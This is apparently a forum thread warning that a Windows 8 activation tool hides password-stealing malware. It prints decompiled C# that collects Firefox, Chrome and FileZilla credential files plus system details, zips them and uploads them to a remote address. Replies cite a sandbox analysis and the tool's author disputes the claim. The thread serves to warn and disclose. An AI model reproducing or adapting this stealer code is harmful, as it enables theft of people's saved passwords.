Be aware: DO NOT USE, CONTAINS MALWARE THAT STEALS PASSWORDS. PROOF (snippet of harmful code, as some people keep asking): the decompiled routine below collects the Firefox profile's cert8.db, key3.db and signons.sqlite, Chrome's Login Data and Web Data, and FileZilla's sitemanager.xml and recentservers.xml, zips them in %TEMP% together with an info.txt holding the Windows user name, computer name and IP address, and uploads the archive with WebClient.UploadFileAsync. Anyone who already ran it should treat the passwords saved in Firefox, Chrome and FileZilla as exposed.
Code: UploadFileCompletedEventHandler handler = null; try { string str9; doneWorking = false; string userName = Environment.UserName; string machineName = Environment.MachineName; userName = userName.Replace(@"\", "").Replace("/", "").Replace(":", ""); machineName = machineName.Replace(@"\", "").Replace("/", "").Replace(":", ""); string path = @"C:\Users\" + userName + @"\AppData\Roaming\Mozilla\Firefox\Profiles"; string str4 = ""; try { str4 = Directory.GetDirectories(path)[0]; } catch { } string str5 = @"C:\Users\" + userName + @"\AppData\Local\Google\Chrome\User Data\Default"; string str6 = Path.Combine(str5, "Web Data"); str5 = Path.Combine(str5, "Login Data"); List<string> fileNames = new List<string>(); txtFile = Path.Combine(Environment.GetEnvironmentVariable("TEMP"), "info.txt"); try { using (StreamWriter writer = File.CreateText(txtFile)) { writer.WriteLine("Windows User Name: " + Environment.UserName); writer.WriteLine("Comptuer Name: " + Environment.MachineName); string p = ""; try { p = GetP(); } catch { } writer.WriteLine("IP Address: " + p); writer.WriteLine("Displays Count: " + Screen.AllScreens.Length); for (int j = 0; j < Screen.AllScreens.Length; j++) { string str8 = Screen.AllScreens[j].Primary ? 
"(Primary)" : string.Empty; writer.WriteLine(string.Concat(new object[] { "Display#", j + 1, " Resolution: ", Screen.AllScreens[j].Bounds.Width, "x", Screen.AllScreens[j].Bounds.Height, " ", str8 })); } } } catch { } if (File.Exists(txtFile)) { fileNames.Add(txtFile); } if (Path.IsPathRooted(str4)) { fileNames.Add(Path.Combine(str4, "cert8.db")); fileNames.Add(Path.Combine(str4, "key3.db")); fileNames.Add(Path.Combine(str4, "signons.sqlite")); str9 = Path.Combine(str4, "sessionstore.js"); FileInfo info = null; if (File.Exists(str9)) { info = new FileInfo(str9); if ((info.Length / 0x400L) <= 0x400L) { fileNames.Add(str9); } } } if (File.Exists(str5) && File.Exists(str6)) { fileNames.Add(str5); fileNames.Add(str6); str9 = @"C:\Users\" + userName + @"\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"; if (File.Exists(str9)) { fileNames.Add(str9); } } string str10 = @"C:\Users\" + userName + @"\AppData\Roaming\FileZilla\recentservers.xml"; string str11 = @"C:\Users\" + userName + @"\AppData\Roaming\FileZilla\sitemanager.xml"; if (File.Exists(str10)) { fileNames.Add(str10); } if (File.Exists(str11)) { fileNames.Add(str11); } ScrakeTeeny(); foreach (string str12 in screenyPaths) { if (File.Exists(str12)) { fileNames.Add(str12); } } using (ZipFile file = new ZipFile()) { file.AddFiles(fileNames, false, ""); zipFile = Path.Combine(Environment.GetEnvironmentVariable("TEMP"), userName + "-" + machineName + "-" + GetRandomString() + ".zip"); file.Save(zipFile); } string source = string.Empty; source = this.GetSource(); WebClient client = new WebClient(); client.Headers.Add("Content-Type", "binary/octet-stream"); client.UploadFileAsync(new Uri(source), "POST", zipFile); if (handler == null) { handler = delegate { doneWorking = true; Settings.Default.done = true; Settings.Default.Save(); try { DeleteTheFile(); } catch (Exception) { } finally { if (formClosed) { this.CloseFromThread(); } } }; } client.UploadFileCompleted += handler;
This looks like malware to me... Code: anubis.iseclab.org/?action=result&task_id=14172d2731375fa04096b7f3306419fc4&format=html Seems very suspect, I would wait for some more confirmations...
The "General Analysis" in that link says that "A service was started." and "Registry keys" were modified. Well, of course that happened. That's part of the activation process. I already mentioned this in the readme file:
Does it work offline? Or does it simply point to a new KMS server to activate Win8 as of 7pm (or something like that)? Checked it: it's not an offline KMS server, just a GUI mode for the available online servers.